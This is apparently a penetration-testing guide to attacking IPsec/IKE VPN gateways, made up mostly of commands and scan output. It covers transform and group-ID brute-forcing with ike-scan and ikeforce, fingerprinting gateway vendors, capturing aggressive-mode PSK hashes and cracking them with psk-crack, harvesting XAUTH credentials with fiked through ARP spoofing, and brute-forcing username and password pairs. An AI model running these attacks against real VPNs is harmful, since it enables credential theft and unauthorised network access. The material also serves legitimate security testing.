IPsec is the most commonly used technology for both gateway-to-gateway (LAN-to-LAN) and host to gateway (remote access) enterprise VPN solutions.
IKE is a type of ISAKMP (Internet Security Association Key Management Protocol) implementation, which is a framework for authentication and key exchange. IKE establishes the security association (SA) between two endpoints through a three-phase process:
Phase 1: Establish a secure channel between 2 endpoints using a Pre-Shared Key (PSK) or certificates. It can use main mode (3 pairs of messages) or aggresive mode messages).
Phase1.5: This is optional, is called Extended Authentication Phase and authenticates the user that is trying to connect (user+password).
Phase2: Negotiates the parameter for the data security using ESP and AH. It can use a different algorithm than the one used in phase 1 (Perfect Forward Secrecy (PFS)).
Default port: 500/udp
root@bt:~# nmap -sU -p 500 172.16.21.200Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 ISTNmap scan report for 172.16.21.200Host is up (0.00036s latency).PORT STATE SERVICE500/udp open isakmpMAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)
The IPSec configuration can be prepared only to accept one or a few transformations. A transformation is a combination of values. Each transform contains a number of attributes like DES or 3DES as the encryption algorithm, SHA or MD5 as the integrity algorithm, a pre-shared key as the authentication type, Diffie-Hellman 1 or 2 as the key distribution algorithm and 28800 seconds as the lifetime.
Then, the first thing that you have to do is find a correct transformation, so the server will talk to you. To do so, you can use the tool ike-scan. By default, Ike-scan works in main mode, and sends a packet to the gateway with an ISAKMP header and a single proposal with eight transforms inside it.
Depending o the response you can obtain some information about the endpoint:
root@bt:~# ike-scan -M 172.16.21.200Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)172.16.21.200 Main Mode Handshake returnedHDR=(CKY-R=d90bf054d6b76401)SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
As you can see in the previous response, there is a field called AUTH with the value PSK. This means that the vpn is configured using a preshared key (and this is really good for a pentester). The value of the last line is also very important:
0 returned handshake; 0 returned notify: This means the target is not an IPsec gateway.
1 returned handshake; 0 returned notify: This means the target is configured for IPsec and is willing to perform IKE negotiation, and either one or more of the transforms you proposed are acceptable (a valid transform will be shown in the output)
0 returned handshake; 1 returned notify: VPN gateways respond with a notify message when none of the transforms are acceptable (though some gateways do not, in which case further analysis and a revised proposal should be tried).
Then, in this case we already have a valid transformation but if you are in the 3rd case, then you need to brute-force a little bit to find a valid transformation:
First of all you need to create all the possible transformations:
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done
And then brute-force each one using ike-scan (this can take several minutes):
while read line; do (echo "Valid trans found: $line" && ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt
If the brute-force didn't work, maybe the server is responding without handshakes even to valid transforms. Then, you could try the same brute-force but using aggressive mode:
while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt
Hopefully a valid transformation is echoed back. You can try the same attack using iker.py. You could also try to brute force transformations with ikeforce:
./ikeforce.py -s1 -a <IP> #-s1 for max speed
In DH Group also: 14 = 2048-bit MODP and 15 = 3072-bit 2 = HMAC-SHA = SHA1 (in this case). The --trans format is $Enc,$Hash,$Auth,$DH
Cisco recommends avoidance of DH groups 1 and 2 in particular. The paper’s authors describe how it is likely that nation states can decrypt IPsec sessions negotiated using weak groups via discrete log precomputation. The hundreds of millions of dollars spent performing precomputation are amortised through the real-time decryption of any session using a weak group (1,024-bit or smaller).
Then, you can use ike-scan to try to discover the vendor of the device. The tool send an initial proposal and stops replaying. Then, it will analyze the time difference between the received messages from the server and the matching response pattern, the pen tester can successfully fingerprint the VPN gateway vendor. More over, some VPN servers will use the optional Vendor ID (VID) payload with IKE.
Specify the valid transformation if needed (using --trans)
If IKE discover which is the vendor it will print it:
root@bt:~# ike-scan -M --showbackoff 172.16.21.200Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)172.16.21.200 Main Mode Handshake returnedHDR=(CKY-R=4f3ec84731e2214a)SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)IKE Backoff Patterns:IP Address No. Recv time Delta Time172.16.21.200 1 1322286031.744904 0.000000172.16.21.200 2 1322286039.745081 8.000177172.16.21.200 3 1322286047.745989 8.000908172.16.21.200 4 1322286055.746972 8.000983172.16.21.200 Implementation guess: Cisco VPN ConcentratorEnding ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
This can be also achieve with nmap script ike-version
For being allowed to capture the hash you need a valid transformation supporting Aggressive mode and the correct ID (group name).
You probably won't know the valid group name, so you will have to brute-force it.
To do so, I would recommend you 2 methods:
First of all try to make a request with a fake ID trying to gather the hash ("-P"):
ike-scan -P -M -A -n fakeID <IP>
If no hash is returned, then probably this method of brute forcing will work. If some hash is returned, this means that a fake hash is going to be sent back fora fake ID, so this method won't be reliable to brute-force the ID. For example, a fake hash could be returned (this happens in modern versions):
But if as I have said, no hash is returned, then you should try to brute-force common group names using ike-scan.
This script will try to brute-force possible IDs and will return the IDs where a valid handshake is returned (this will be a valid group name).
If you have discovered an specific transformation add it in the ike-scan command. And if you have discovered several transformations feel free to add a new loop to try them all (you should try them all until one of the is working properly).
while read line; do (echo "Found ID: $line" && ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
ikeforce.py is a tool that can be used to brute force IDs also. This tool will try to exploit different vulnerabilities that could be used to distinguish between a valid and a non-valid ID (could have false positives and false negatives, that is why I prefer to use the ike-scan method if possible).
By default ikeforce will send at the beginning some random ids to check the behavior of the server and determinate the tactic to use.
The first method is to brute-force the group names by searching for the information Dead Peer Detection DPD of Cisco systems (this info is only replayed by the server if the group name is correct).
The second method available is to checks the number of responses sent to each try because sometimes more packets are sent when the correct id is used.
The third method consist on searching for "INVALID-ID-INFORMATION" in response to incorrect ID.
Finally, if the server does not replay anything to the checks, ikeforce will try to brute force the server and check if when the correct id is sent the server replay with some packet. Obviously, the goal of brute forcing the id is to get the PSK when you have a valid id. Then, with the id and PSK you will have to bruteforce the XAUTH (if it is enabled).
If you have discovered an specific transformation add it in the ikeforce command. And if you have discovered several transformations feel free to add a new loop to try them all (you should try them all until one of the is working properly).
git clone https://github.com/SpiderLabs/ikeforce.gitpip install 'pyopenssl==17.2.0' #It is old and need this version of the library
./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic
It is also possible to obtain valid usernames by sniffing the connection between the VPN client and server, as the first aggressive mode packet containing the client ID is sent in the clear (from the book Network Security Assessment: Know Your Network)
Finally,If you have find a valid transformation and the group name and the aggressive mode is allowed, then you can very easily grab the crackable hash:
ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor
The hash will be saved inside hash.txt
You can use psk-crack to crack the password
psk-crack -d <Wordlist_path> psk.txt #To crack the hash#You can also crack it using john (using ikescan2john.py) and hashcat.
Most implementations use aggressive mode IKE with a PSK to perform group authentication, and XAUTH to provide additional user authentication (via Microsoft Active Directory, RADIUS, or similar). Within IKEv2, EAP replaces XAUTH to authenticate users.
So you can capture the data of the login using fiked and see if there is any default username (You need to redirect IKE traffic to
fiked for sniffing, which can be done with the help of ARP spoofing, more info). Fiked will act as a VPN endpoint and will capture the XAuth credentials:
fiked -g <IP> -k testgroup:secretkey -l output.txt -d
Also, using IPSec try to make a MitM attack and block all traffic to port 500, if the IPSec tunnel cannot be established maybe the traffic will be sent in clear.
To brute force the XAUTH (when you know a valid group name id and the psk) you can use a username or list of usernames and a list o passwords:
./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]
This way, ikeforce will try to connect using each combination of username:password.
If you found one or several valid transforms just use them like in the previous steps.
In Kali VPNC is used to establish IPsec tunnels. The profiles have to be located in /etc/vpnc/ and you can use the tool vpnc to call them. Example taken from book Network Security Assessment 3rd Edition.
root@kali:~# cat > /etc/vpnc/vpntest.conf << STOPIPSec gateway 10.0.0.250IPSec ID vpntestIPSec secret groupsecret123IKE Authmode pskXauth username chrisXauth password tiffers1STOProot@kali:~# vpnc vpntestVPNC started in background (pid: 6980)...root@kali:~# ifconfig tun0